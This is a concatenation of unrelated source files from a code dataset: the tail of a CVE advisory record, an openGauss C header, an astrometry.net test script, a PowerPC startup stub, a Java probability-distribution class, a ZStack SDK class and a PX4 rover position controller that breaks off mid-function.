"details": "The Java Management Extensions Remote API Remote Method Invocation over Internet Inter-ORB Protocol (JMX RMI-IIOP) API in Java Dynamic Management Kit 5.1 before 20070309 does not properly enforce the java.policy, which allows local users to obtain certain MBeans data access by operating a server application accessed by a privileged remote authenticated user.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2007-1419"
},
{
"type": "WEB",
"url": "http://osvdb.org/34018"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/24497"
},
{
"type": "WEB",
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102835-1"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/22907"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id?1017745"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2007/0906"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 622 |
360 | <reponame>Yanci0/openGauss-server
/*--------------------------------------------------------------------
* bgworker.h
* Pluggable background workers interface
*
* A background worker is a process able to run when create index for redistribution,
* create a parallel bgworker framework to scan and rebuild indexes in parallel.
*
* Portions Copyright (c) 2021 Huawei Technologies Co.,Ltd.
*
* IDENTIFICATION
* src/include/postmaster/bgworker.h
* --------------------------------------------------------------------
*/
#ifndef BGWORKER_H
#define BGWORKER_H
#include "access/xact.h"
#include "access/nbtree.h"
#include "utils/tuplesort.h"
#include "catalog/index.h"
/*---------------------------------------------------------------------
* External module API.
*---------------------------------------------------------------------
*/
extern int g_max_worker_processes;
#define BGWORKER_LOOP_SLEEP_TIME 10000
/* bgworker's current status duration limit, 500 * BGWORKER_LOOP_SLEEP_TIME = 5s */
#define BGWORKER_STATUS_DURLIMIT 500
#define BGWORKER_MAX_ERROR_LEN 256
typedef enum BgwHandleStatus {
BGW_NOT_YET_STARTED, /* worker hasn't been started yet */
BGW_STARTED, /* worker is running */
BGW_STOPPED, /* worker has finished work */
BGW_FAILED, /* worker has failed */
BGW_TERMINATED /* worker has exit successfully */
} BgwHandleStatus;
struct BgWorkerContext;
typedef void (*bgworker_main)(const BgWorkerContext *bwc);
typedef void (*bgworker_exit)(const BgWorkerContext *bwc);
typedef struct BgWorkerContext {
StreamTxnContext transactionCxt;
void *bgshared;
PGPROC *leader;
char *databaseName;
char *userName;
bool enable_cluster_resize;
bgworker_main main_entry;
bgworker_exit exit_entry;
} BgWorkerContext;
typedef struct BgWorkerErrorData {
int elevel;
int sqlerrcode;
char message[BGWORKER_MAX_ERROR_LEN];
char detail[BGWORKER_MAX_ERROR_LEN];
} BgWorkerErrorData;
typedef struct BackgroundWorker {
ThreadId bgw_notify_pid; /* SIGUSR1 this backend on start/stop */
BgwHandleStatus bgw_status; /* Status of this bgworker */
uint64 bgw_status_dur; /* duration in this status */
BgWorkerErrorData bgw_edata; /* error information of a bgworker */
pg_atomic_uint32 disable_count; /* indicate whether the bgworker is disabled */
slist_node rw_lnode; /* list link */
} BackgroundWorker;
typedef struct BackgroundWorkerArgs {
BgWorkerContext *bgwcontext;
BackgroundWorker *bgworker;
} BackgroundWorkerArgs;
/* Register a new bgworker during shared_preload_libraries */
extern void RegisterBackgroundWorker(BackgroundWorker *worker);
extern void LaunchBackgroundWorkers(int nworkers, void *bgshared, bgworker_main bgmain, bgworker_exit bgexit);
extern void BackgroundWorkerMain(void);
extern bool IsBgWorkerProcess(void);
extern void BgworkerListSyncQuit();
extern void BgworkerListWaitFinish(int *nparticipants);
#endif /* BGWORKER_H */
| 1,156 |
460 | <reponame>juandesant/astrometry.net
# This file is part of the Astrometry.net suite.
# Licensed under a 3-clause BSD style license - see LICENSE
from __future__ import print_function
import matplotlib
matplotlib.use('Agg')
import pylab as plt
import sys
from astrometry.sdss.dr8 import *
import numpy as np
def test_astrans(sdss, r,c,f,b):
bandnum = band_index(b)
sdss.retrieve('frame', r, c, f, b)
frame = sdss.readFrame(r, c, f, b)
astrans = frame.getAsTrans()
sdss.retrieve('photoObj', r, c, f)
obj = sdss.readPhotoObj(r, c, f)
tab = obj.getTable()
#tab.about()
x,y = tab.colc[:,bandnum], tab.rowc[:,bandnum]
ra,dec = tab.ra, tab.dec
for r,d in zip(ra,dec):
print('ra,dec', r,d)
#print 'py:'
x1,y1 = astrans.radec_to_pixel_single_py(r, d)
print(' py', x1,y1)
#print 'c:'
x2,y2 = astrans.radec_to_pixel_single_c(r, d)
print(' c', x2,y2)
assert(np.abs(x1 - x2) < 1e-6)
assert(np.abs(y1 - y2) < 1e-6)
r2,d2 = astrans.pixel_to_radec(x, y)
plt.clf()
plt.plot(ra, dec, 'r.')
plt.plot(r2, d2, 'bo', mec='b', mfc='none')
plt.savefig('rd.png')
r3,d3 = [],[]
for xi,yi in zip(x,y):
ri,di = astrans.pixel_to_radec(xi, yi)
r3.append(ri)
d3.append(di)
plt.clf()
plt.plot(ra, dec, 'r.')
plt.plot(r3, d3, 'bo', mec='b', mfc='none')
plt.savefig('rd3.png')
x2,y2 = astrans.radec_to_pixel(ra, dec)
plt.clf()
plt.plot(x, y, 'r.')
plt.plot(x2, y2, 'bo', mec='b', mfc='none')
plt.savefig('xy.png')
x3,y3 = [],[]
for ri,di in zip(ra, dec):
xi,yi = astrans.radec_to_pixel(ri, di)
x3.append(xi)
y3.append(yi)
plt.clf()
plt.plot(x, y, 'r.')
plt.plot(x3, y3, 'bo', mec='b', mfc='none')
plt.savefig('xy3.png')
if __name__ == '__main__':
sdss = DR8()
#test_astrans(sdss, 4623, 1, 203, 'r')
test_astrans(sdss, 5065, 1, 68, 'r')
sys.exit(0)
fnew = sdss.readFrame(4623, 1, 203, 'r', filename='frame-r-004623-1-0203.fits')
print('fnew:', fnew)
forig = sdss.readFrame(4623, 1, 203, 'r', 'frame-r-004623-1-0203.fits.orig')
print('forig:', forig)
frame = sdss.readFrame(3712, 3, 187, 'r')
print('frame:', frame)
img = frame.getImage()
print(' image', img.shape)
fpobj = sdss.readFpObjc(6581, 2, 135)
print('fpobj:', fpobj)
fpm = sdss.readFpM(6581, 2, 135, 'i')
print('fpm:', fpm)
psf = sdss.readPsField(6581, 2, 135)
print('psfield:', psf)
| 1,366 |
1,244 | <filename>arch/powerpc/crt_arch.h
__asm__("\
.global _start \n\
.type _start, %function \n\
_start: \n\
mr 3, 1 \n\
clrrwi 1, 1, 4 \n\
li 0, 0 \n\
stwu 1, -16(1) \n\
mtlr 0 \n\
stw 0, 0(1) \n\
bl __cstart \n\
");
| 134 |
364 | <reponame>xiaobing007/dagli<filename>math-distribution/src/main/java/com/linkedin/dagli/math/distribution/ArrayDiscreteDistribution.java
package com.linkedin.dagli.math.distribution;
import com.linkedin.dagli.util.array.ArraysEx;
import it.unimi.dsi.fastutil.objects.Object2DoubleMap;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.stream.Collector;
import java.util.stream.IntStream;
import java.util.stream.Stream;
/**
* An immutable {@link DiscreteDistribution} that memorizes labels and probabilities entries in space-efficient arrays.
*/
public class ArrayDiscreteDistribution<T> extends AbstractDiscreteDistribution<T> {
private static final long serialVersionUID = 1;
// entries are stored via parallel arrays rather than concrete LabelProbability objects for efficiency
private final T[] _labels; // this is an Object[] masquerading as T[]; this is safe because we never expose it outside
// this class
private final double[] _probabilities;
/**
* Gets the label of the entry in this distribution at the given index. The index refers to the position of the entry
* in order of <b>highest probability to smallest</b> (with ties broken arbitrarily). The order is consistent across
* all methods of this object and fixed (so entries that are tied in probability will not swap positions).
*
* @return the label of the requested entry
*/
public T getLabelByIndex(int index) {
return _labels[index];
}
/**
* Gets the label of the entry in this distribution at the given index. The index refers to the position of the entry
* in order of <b>highest probability to smallest</b> (with ties broken arbitrarily). The order is consistent across
* all methods of this object and fixed (so entries that are tied in probability will not swap positions).
*
* @return the probability of the requested entry
*/
public double getProbabilityByIndex(int index) {
return _probabilities[index];
}
/**
* Gets a collector that can be used to create a ArrayDiscreteDistribution from a stream, e.g.
* someDistribution.stream().doSomething().collect(ArrayDiscreteDistribution.collector());
*
* @param <T> the type of the label
* @return a collector that can be used to create a ArrayDiscreteDistribution from a stream
*/
public static <T> Collector<LabelProbability<T>, ?, ArrayDiscreteDistribution<T>> collector() {
return Collector.<LabelProbability<T>, ArrayList<LabelProbability<T>>, ArrayDiscreteDistribution<T>>of(
ArrayList::new, ArrayList::add, (l1, l2) -> {
l1.addAll(l2);
return l1;
}, ArrayDiscreteDistribution::new);
}
/**
* Creates a new ArrayDiscreteDistribution from a collection of LabelProbability entries. This collection should not
* contain duplicate labels.
*
* @param entryList The entries for the distribution. Each entry should have a distinct label.
*/
@SuppressWarnings("unchecked") // masquerading Object[] as T[] is safe because it's never exposed outside the class
public ArrayDiscreteDistribution(Collection<LabelProbability<T>> entryList) {
this((T[]) entryList.stream().map(LabelProbability::getLabel).toArray(),
entryList.stream().mapToDouble(LabelProbability::getProbability).toArray(), null);
}
/**
* Creates a new ArrayDiscreteDistribution from parallel arrays of labels and probabilities. "Parallel" arrays
* means that the entry at a particular index in one array corresponds with the element at that index in the other.
*
* The provided arrays are copied; the new distribution does not modify or take ownership of them.
*
* @param labels the array of (distinct) labels; it's safe to pass an Object[] masquerading as T[]
* @param probabilities the array of probabilities
*/
public ArrayDiscreteDistribution(T[] labels, double[] probabilities) {
this(labels.clone(), probabilities.clone(), null);
}
/**
* Creates a new ArrayDiscreteDistribution from a map of labels to probabilities.
*
* @param labelToProbabilityMap the map of labels to probabilities
*/
public ArrayDiscreteDistribution(Object2DoubleMap<T> labelToProbabilityMap) {
this(getArraysFromMap(labelToProbabilityMap));
}
/**
* Simple container class for storing an array of labels and its corresponding array of probabilities.
*
* @param <T> the type of the label
*/
private static class LabelAndProbabilityArrays<T> {
/**
* The array of labels.
*/
T[] _labels;
/**
* The array of probabilities.
*/
double[] _probabilities;
/**
* Creates a new instance with the specifiied labels and probabilities.
*
* @param labels the array of labels
* @param probabilities the array of probabilities
*/
LabelAndProbabilityArrays(T[] labels, double[] probabilities) {
_labels = labels;
_probabilities = probabilities;
}
}
/**
* Extracts the labels and probabilities from a map as parallel arrays and packs them in a LabelAndProbabilityArrays
* object. This method is required because of the constraints Java places on constructor chaining.
*
* @param labelToProbabilityMap a map from labels to their probabilities
* @param <T> the type of the labels
* @return a LabelAndProbabilityArrays containing the arrays of labels and probabilities
*/
@SuppressWarnings("unchecked") // masquerading Object[] as T[] is safe here because it will never be exposed outside
// this class
private static <T> LabelAndProbabilityArrays<T> getArraysFromMap(Object2DoubleMap<T> labelToProbabilityMap) {
// if the labelToProbabilityMap is of type Object2DoubleFixedArrayMap, it's very cheap to pull out its underlying
// arrays:
if (labelToProbabilityMap instanceof Object2DoubleFixedArrayMap) {
return new LabelAndProbabilityArrays<>(((Object2DoubleFixedArrayMap<T>) labelToProbabilityMap).getKeyArray(),
((Object2DoubleFixedArrayMap<T>) labelToProbabilityMap).getValueArray());
}
// otherwise, we need to something a bit more generic:
T[] labels = (T[]) new Object[labelToProbabilityMap.size()]; // masquerading Object[] as T[]
double[] probabilities = new double[labelToProbabilityMap.size()];
int offset = 0;
// copy labels and probabilities into parallel arrays
for (Object2DoubleMap.Entry<T> entry : labelToProbabilityMap.object2DoubleEntrySet()) {
labels[offset] = entry.getKey();
probabilities[offset] = entry.getDoubleValue();
offset++;
}
return new LabelAndProbabilityArrays<>(labels, probabilities);
}
/**
* Constructor that unpacks a LabelAndProbabilityArrays object and passes the result to the "real" constructor,
* assuming ownership of the arrays therein.
*
* This "extra" constructor is needed because of the constraints Java places upon constructor chaining.
*
* @param labelAndProbabilityArrays a container containing the label and probability parallel arrays
*/
private ArrayDiscreteDistribution(LabelAndProbabilityArrays<T> labelAndProbabilityArrays) {
this(labelAndProbabilityArrays._labels, labelAndProbabilityArrays._probabilities, null);
}
/**
* Creates a new ArrayDiscreteDistribution from parallel arrays of labels and probabilities. "Parallel" arrays
* means that the entry at a particular index in one array corresponds with the element at that index in the other.
*
* <strong>This method takes ownership of the provided arrays and may modify them.</strong> The arrays should not be
* changed after they have passed to this method. The advantage of this method over the
* {@link #ArrayDiscreteDistribution(Object[], double[])} constructor is that it is more efficient due to fewer array
* copies required.
*
* @param labels the array of (distinct) labels; it's safe to pass an Object[] masquerading as a T[]
* @param probabilities the array of probabilities
*/
public static <T> ArrayDiscreteDistribution<T> wrap(T[] labels, double[] probabilities) {
return new ArrayDiscreteDistribution<>(labels, probabilities, null);
}
/**
* Creates a new ArrayDiscreteDistribution from parallel arrays of labels and probabilities. "Parallel" arrays
* means that the entry at a particular index in one array corresponds with the element at that index in the other.
*
* <b>Note:</b> this method takes ownership of the provided arrays and may modify them. The arrays should not be
* changed after they have passed to this method.
*
* @param labels the array of (distinct) labels
* @param probabilities the array of probabilities
* @param dummyArg an unused argument used to differentiate this constructor from another, otherwise identical one
*/
private ArrayDiscreteDistribution(T[] labels, double[] probabilities, Void dummyArg) {
// check the validity of our inputs with asserts
assert Arrays.stream(labels).distinct().count() == labels.length; // all labels unique?
assert Arrays.stream(probabilities).noneMatch(p -> p < 0); // no negative probabilities
// this argument check is cheap enough to do every time
if (labels.length != probabilities.length) {
throw new IllegalArgumentException(
"Length of labels array, " + labels.length + ", does not match the length of the probabilities array, "
+ probabilities.length);
}
// if the items in the list are not already in reverse order (highest probability to lowest), sort them
if (!ArraysEx.isMonotonicallyDecreasing(probabilities)) {
ArraysEx.sort(probabilities, labels);
ArraysEx.reverse(probabilities);
ArraysEx.reverse(labels);
}
// eliminate 0-probability events, if any
int firstZeroIndex = firstZeroIndexInReverseSortedProbabilityArray(probabilities);
if (firstZeroIndex < probabilities.length) {
// we have at least one 0-probability event
probabilities = Arrays.copyOf(probabilities, firstZeroIndex);
labels = Arrays.copyOf(labels, firstZeroIndex);
}
_probabilities = probabilities;
_labels = labels;
}
/**
* Finds the offset of the first zero in a reverse-sorted (largest to smallest) array of non-negative, finite values.
*
* If the array contains no zeros, the return value is the length of the passed array.
*
* @param probabilities the reverse-sorted array of non-negative, finite doubles to scan
* @return the offset of the first zero in the array, or the length of the array if it contains no zeros.
*/
private static int firstZeroIndexInReverseSortedProbabilityArray(double[] probabilities) {
// scan backwards, looking for the first non-zero entry
for (int i = probabilities.length - 1; i >= 0; i--) {
if (probabilities[i] != 0) {
return i + 1; // i is the offset of the last non-zero; therefore i + 1 is the offset of the first zero
}
}
return 0; // the array is all zeros (or zero-length)
}
/**
* Private no-args constructor specifically for the benefit of Kryo
*/
private ArrayDiscreteDistribution() {
// These values will be overwritten by Kryo. Final does not stop Kryo from modifying a field when loading an
// object.
_probabilities = null;
_labels = null;
}
@Override
public long size64() {
return _labels.length;
}
@Override
public Stream<LabelProbability<T>> stream() {
return IntStream.range(0, _labels.length)
.mapToObj(index -> new LabelProbability<>(_labels[index], _probabilities[index]));
}
}
| 3,547 |
879 | <filename>sdk/src/main/java/org/zstack/sdk/VolumeBackupStorageRefInventory.java
package org.zstack.sdk;
public class VolumeBackupStorageRefInventory {
public java.lang.String volumeBackupUuid;
public void setVolumeBackupUuid(java.lang.String volumeBackupUuid) {
this.volumeBackupUuid = volumeBackupUuid;
}
public java.lang.String getVolumeBackupUuid() {
return this.volumeBackupUuid;
}
public java.lang.String backupStorageUuid;
public void setBackupStorageUuid(java.lang.String backupStorageUuid) {
this.backupStorageUuid = backupStorageUuid;
}
public java.lang.String getBackupStorageUuid() {
return this.backupStorageUuid;
}
public java.lang.String installPath;
public void setInstallPath(java.lang.String installPath) {
this.installPath = installPath;
}
public java.lang.String getInstallPath() {
return this.installPath;
}
public java.lang.String status;
public void setStatus(java.lang.String status) {
this.status = status;
}
public java.lang.String getStatus() {
return this.status;
}
public java.sql.Timestamp createDate;
public void setCreateDate(java.sql.Timestamp createDate) {
this.createDate = createDate;
}
public java.sql.Timestamp getCreateDate() {
return this.createDate;
}
public java.sql.Timestamp lastOpDate;
public void setLastOpDate(java.sql.Timestamp lastOpDate) {
this.lastOpDate = lastOpDate;
}
public java.sql.Timestamp getLastOpDate() {
return this.lastOpDate;
}
}
| 624 |
1,537 | /****************************************************************************
*
* Copyright (c) 2017, 2021 PX4 Development Team. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
* 3. Neither the name PX4 nor the names of its contributors may be
* used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
****************************************************************************/
/**
*
* This module is a modification of the fixed wing module and it is designed for ground rovers.
* It has been developed starting from the fw module, simplified and improved with dedicated items.
*
* All the acknowledgments and credits for the fw wing app are reported in those files.
*
* @author <NAME> <<EMAIL>>
*/
#include "RoverPositionControl.hpp"
#include <lib/geo/geo.h>
#define ACTUATOR_PUBLISH_PERIOD_MS 4
using namespace matrix;
/**
* L1 control app start / stop handling function
*
* @ingroup apps
*/
extern "C" __EXPORT int rover_pos_control_main(int argc, char *argv[]);
RoverPositionControl::RoverPositionControl() :
ModuleParams(nullptr),
WorkItem(MODULE_NAME, px4::wq_configurations::nav_and_controllers),
/* performance counters */
_loop_perf(perf_alloc(PC_ELAPSED, MODULE_NAME": cycle")) // TODO : do we even need these perf counters
{
}
RoverPositionControl::~RoverPositionControl()
{
perf_free(_loop_perf);
}
bool
RoverPositionControl::init()
{
if (!_vehicle_angular_velocity_sub.registerCallback()) {
PX4_ERR("vehicle angular velocity callback registration failed!");
return false;
}
return true;
}
void RoverPositionControl::parameters_update(bool force)
{
// check for parameter updates
if (_parameter_update_sub.updated() || force) {
// clear update
parameter_update_s pupdate;
_parameter_update_sub.copy(&pupdate);
// update parameters from storage
updateParams();
_gnd_control.set_l1_damping(_param_l1_damping.get());
_gnd_control.set_l1_period(_param_l1_period.get());
_gnd_control.set_l1_roll_limit(math::radians(0.0f));
pid_init(&_speed_ctrl, PID_MODE_DERIVATIV_CALC, 0.01f);
pid_set_parameters(&_speed_ctrl,
_param_speed_p.get(),
_param_speed_i.get(),
_param_speed_d.get(),
_param_speed_imax.get(),
_param_gndspeed_max.get());
}
}
void
RoverPositionControl::vehicle_control_mode_poll()
{
if (_control_mode_sub.updated()) {
_control_mode_sub.copy(&_control_mode);
}
}
void
RoverPositionControl::manual_control_setpoint_poll()
{
if (_control_mode.flag_control_manual_enabled) {
if (_manual_control_setpoint_sub.copy(&_manual_control_setpoint)) {
float dt = math::constrain(hrt_elapsed_time(&_manual_setpoint_last_called) * 1e-6f, 0.0002f, 0.04f);
if (!_control_mode.flag_control_climb_rate_enabled &&
!_control_mode.flag_control_offboard_enabled) {
if (_control_mode.flag_control_attitude_enabled) {
// STABILIZED mode generate the attitude setpoint from manual user inputs
_att_sp.roll_body = 0.0;
_att_sp.pitch_body = 0.0;
/* reset yaw setpoint to current position if needed */
if (_reset_yaw_sp) {
const float vehicle_yaw = Eulerf(Quatf(_vehicle_att.q)).psi();
_manual_yaw_sp = vehicle_yaw;
_reset_yaw_sp = false;
} else {
const float yaw_rate = math::radians(_param_gnd_man_y_max.get());
_att_sp.yaw_sp_move_rate = _manual_control_setpoint.y * yaw_rate;
_manual_yaw_sp = wrap_pi(_manual_yaw_sp + _att_sp.yaw_sp_move_rate * dt);
}
_att_sp.yaw_body = _manual_yaw_sp;
_att_sp.thrust_body[0] = _manual_control_setpoint.z;
Quatf q(Eulerf(_att_sp.roll_body, _att_sp.pitch_body, _att_sp.yaw_body));
q.copyTo(_att_sp.q_d);
_att_sp.timestamp = hrt_absolute_time();
_attitude_sp_pub.publish(_att_sp);
} else {
_act_controls.control[actuator_controls_s::INDEX_ROLL] = 0.0f; // Nominally roll: _manual_control_setpoint.y;
_act_controls.control[actuator_controls_s::INDEX_PITCH] = 0.0f; // Nominally pitch: -_manual_control_setpoint.x;
// Set heading from the manual roll input channel
_act_controls.control[actuator_controls_s::INDEX_YAW] =
_manual_control_setpoint.y; // Nominally yaw: _manual_control_setpoint.r;
// Set throttle from the manual throttle channel
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = _manual_control_setpoint.z;
_reset_yaw_sp = true;
}
} else {
_reset_yaw_sp = true;
}
_manual_setpoint_last_called = hrt_absolute_time();
}
}
}
void
RoverPositionControl::position_setpoint_triplet_poll()
{
if (_pos_sp_triplet_sub.updated()) {
_pos_sp_triplet_sub.copy(&_pos_sp_triplet);
}
}
void
RoverPositionControl::attitude_setpoint_poll()
{
if (_att_sp_sub.updated()) {
_att_sp_sub.copy(&_att_sp);
}
}
void
RoverPositionControl::vehicle_attitude_poll()
{
if (_att_sub.updated()) {
_att_sub.copy(&_vehicle_att);
}
}
bool
RoverPositionControl::control_position(const matrix::Vector2d ¤t_position,
const matrix::Vector3f &ground_speed, const position_setpoint_triplet_s &pos_sp_triplet)
{
float dt = 0.01; // Using non zero value to a avoid division by zero
if (_control_position_last_called > 0) {
dt = hrt_elapsed_time(&_control_position_last_called) * 1e-6f;
}
_control_position_last_called = hrt_absolute_time();
bool setpoint = true;
if ((_control_mode.flag_control_auto_enabled ||
_control_mode.flag_control_offboard_enabled) && pos_sp_triplet.current.valid) {
/* AUTONOMOUS FLIGHT */
_control_mode_current = UGV_POSCTRL_MODE_AUTO;
/* get circle mode */
//bool was_circle_mode = _gnd_control.circle_mode();
/* current waypoint (the one currently heading for) */
matrix::Vector2d curr_wp(pos_sp_triplet.current.lat, pos_sp_triplet.current.lon);
/* previous waypoint */
matrix::Vector2d prev_wp = curr_wp;
if (pos_sp_triplet.previous.valid) {
prev_wp(0) = pos_sp_triplet.previous.lat;
prev_wp(1) = pos_sp_triplet.previous.lon;
}
matrix::Vector2f ground_speed_2d(ground_speed);
float mission_throttle = _param_throttle_cruise.get();
/* Just control the throttle */
if (_param_speed_control_mode.get() == 1) {
/* control the speed in closed loop */
float mission_target_speed = _param_gndspeed_trim.get();
if (PX4_ISFINITE(_pos_sp_triplet.current.cruising_speed) &&
_pos_sp_triplet.current.cruising_speed > 0.1f) {
mission_target_speed = _pos_sp_triplet.current.cruising_speed;
}
// Velocity in body frame
const Dcmf R_to_body(Quatf(_vehicle_att.q).inversed());
const Vector3f vel = R_to_body * Vector3f(ground_speed(0), ground_speed(1), ground_speed(2));
const float x_vel = vel(0);
const float x_acc = _vehicle_acceleration_sub.get().xyz[0];
// Compute airspeed control out and just scale it as a constant
mission_throttle = _param_throttle_speed_scaler.get()
* pid_calculate(&_speed_ctrl, mission_target_speed, x_vel, x_acc, dt);
// Constrain throttle between min and max
mission_throttle = math::constrain(mission_throttle, _param_throttle_min.get(), _param_throttle_max.get());
} else {
/* Just control throttle in open loop */
if (PX4_ISFINITE(_pos_sp_triplet.current.cruising_throttle) &&
_pos_sp_triplet.current.cruising_throttle > 0.01f) {
mission_throttle = _pos_sp_triplet.current.cruising_throttle;
}
}
float dist_target = get_distance_to_next_waypoint(_global_pos.lat, _global_pos.lon,
(double)curr_wp(0), (double)curr_wp(1)); // pos_sp_triplet.current.lat, pos_sp_triplet.current.lon);
//PX4_INFO("Setpoint type %d", (int) pos_sp_triplet.current.type );
//PX4_INFO(" State machine state %d", (int) _pos_ctrl_state);
//PX4_INFO(" Setpoint Lat %f, Lon %f", (double) curr_wp(0), (double)curr_wp(1));
//PX4_INFO(" Distance to target %f", (double) dist_target);
switch (_pos_ctrl_state) {
case GOTO_WAYPOINT: {
if (dist_target < _param_nav_loiter_rad.get()) {
_pos_ctrl_state = STOPPING; // We are closer than loiter radius to waypoint, stop.
} else {
_gnd_control.navigate_waypoints(prev_wp, curr_wp, current_position, ground_speed_2d);
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = mission_throttle;
float desired_r = ground_speed_2d.norm_squared() / math::abs_t(_gnd_control.nav_lateral_acceleration_demand());
float desired_theta = (0.5f * M_PI_F) - atan2f(desired_r, _param_wheel_base.get());
float control_effort = (desired_theta / _param_max_turn_angle.get()) * sign(
_gnd_control.nav_lateral_acceleration_demand());
control_effort = math::constrain(control_effort, -1.0f, 1.0f);
_act_controls.control[actuator_controls_s::INDEX_YAW] = control_effort;
}
}
break;
case STOPPING: {
_act_controls.control[actuator_controls_s::INDEX_YAW] = 0.0f;
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = 0.0f;
// Note _prev_wp is different to the local prev_wp which is related to a mission waypoint.
float dist_between_waypoints = get_distance_to_next_waypoint((double)_prev_wp(0), (double)_prev_wp(1),
(double)curr_wp(0), (double)curr_wp(1));
if (dist_between_waypoints > 0) {
_pos_ctrl_state = GOTO_WAYPOINT; // A new waypoint has arrived go to it
}
//PX4_INFO(" Distance between prev and curr waypoints %f", (double)dist_between_waypoints);
}
break;
default:
PX4_ERR("Unknown Rover State");
_pos_ctrl_state = STOPPING;
break;
}
_prev_wp = curr_wp;
} else {
_control_mode_current = UGV_POSCTRL_MODE_OTHER;
setpoint = false;
}
return setpoint;
}
void
RoverPositionControl::control_velocity(const matrix::Vector3f ¤t_velocity)
{
const Vector3f desired_velocity{_trajectory_setpoint.vx, _trajectory_setpoint.vy, _trajectory_setpoint.vz};
float dt = 0.01; // Using non zero value to a avoid division by zero
const float mission_throttle = _param_throttle_cruise.get();
const float desired_speed = desired_velocity.norm();
if (desired_speed > 0.01f) {
const Dcmf R_to_body(Quatf(_vehicle_att.q).inversed());
const Vector3f vel = R_to_body * Vector3f(current_velocity(0), current_velocity(1), current_velocity(2));
const float x_vel = vel(0);
const float x_acc = _vehicle_acceleration_sub.get().xyz[0];
const float control_throttle = pid_calculate(&_speed_ctrl, desired_speed, x_vel, x_acc, dt);
//Constrain maximum throttle to mission throttle
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = math::constrain(control_throttle, 0.0f, mission_throttle);
Vector3f desired_body_velocity;
if (_velocity_frame == VelocityFrame::NED) {
desired_body_velocity = desired_velocity;
} else {
// If the frame of the velocity setpoint is unknown, assume it is in local frame
desired_body_velocity = R_to_body * desired_velocity;
}
const float desired_theta = atan2f(desired_body_velocity(1), desired_body_velocity(0));
float control_effort = desired_theta / _param_max_turn_angle.get();
control_effort = math::constrain(control_effort, -1.0f, 1.0f);
_act_controls.control[actuator_controls_s::INDEX_YAW] = control_effort;
} else {
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = 0.0f;
_act_controls.control[actuator_controls_s::INDEX_YAW] = 0.0f;
}
}
void
RoverPositionControl::control_attitude(const vehicle_attitude_s &att, const vehicle_attitude_setpoint_s &att_sp)
{
// quaternion attitude control law, qe is rotation from q to qd
const Quatf qe = Quatf(att.q).inversed() * Quatf(att_sp.q_d);
const Eulerf euler_sp = qe;
float control_effort = euler_sp(2) / _param_max_turn_angle.get();
control_effort = math::constrain(control_effort, -1.0f, 1.0f);
_act_controls.control[actuator_controls_s::INDEX_YAW] = control_effort;
const float control_throttle = att_sp.thrust_body[0];
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = math::constrain(control_throttle, 0.0f, 1.0f);
}
void
RoverPositionControl::Run()
{
parameters_update(true);
/* run controller on gyro changes */
vehicle_angular_velocity_s angular_velocity;
if (_vehicle_angular_velocity_sub.update(&angular_velocity)) {
/* check vehicle control mode for changes to publication state */
vehicle_control_mode_poll();
attitude_setpoint_poll();
vehicle_attitude_poll();
manual_control_setpoint_poll();
_vehicle_acceleration_sub.update();
/* update parameters from storage */
parameters_update();
/* only run controller if position changed */
if (_local_pos_sub.update(&_local_pos)) {
/* load local copies */
_global_pos_sub.update(&_global_pos);
position_setpoint_triplet_poll();
// Convert Local setpoints to global setpoints
if (_control_mode.flag_control_offboard_enabled) {
if (!_global_local_proj_ref.isInitialized()
|| (_global_local_proj_ref.getProjectionReferenceTimestamp() != _local_pos.ref_timestamp)) {
_global_local_proj_ref.initReference(_local_pos.ref_lat, _local_pos.ref_lon,
_local_pos.ref_timestamp);
_global_local_alt0 = _local_pos.ref_alt;
}
_trajectory_setpoint_sub.update(&_trajectory_setpoint);
// local -> global
_global_local_proj_ref.reproject(
_trajectory_setpoint.x, _trajectory_setpoint.y,
_pos_sp_triplet.current.lat, _pos_sp_triplet.current.lon);
_pos_sp_triplet.current.alt = _global_local_alt0 - _trajectory_setpoint.z;
_pos_sp_triplet.current.valid = true;
}
// update the reset counters in any case
_pos_reset_counter = _global_pos.lat_lon_reset_counter;
matrix::Vector3f ground_speed(_local_pos.vx, _local_pos.vy, _local_pos.vz);
matrix::Vector2d current_position(_global_pos.lat, _global_pos.lon);
matrix::Vector3f current_velocity(_local_pos.vx, _local_pos.vy, _local_pos.vz);
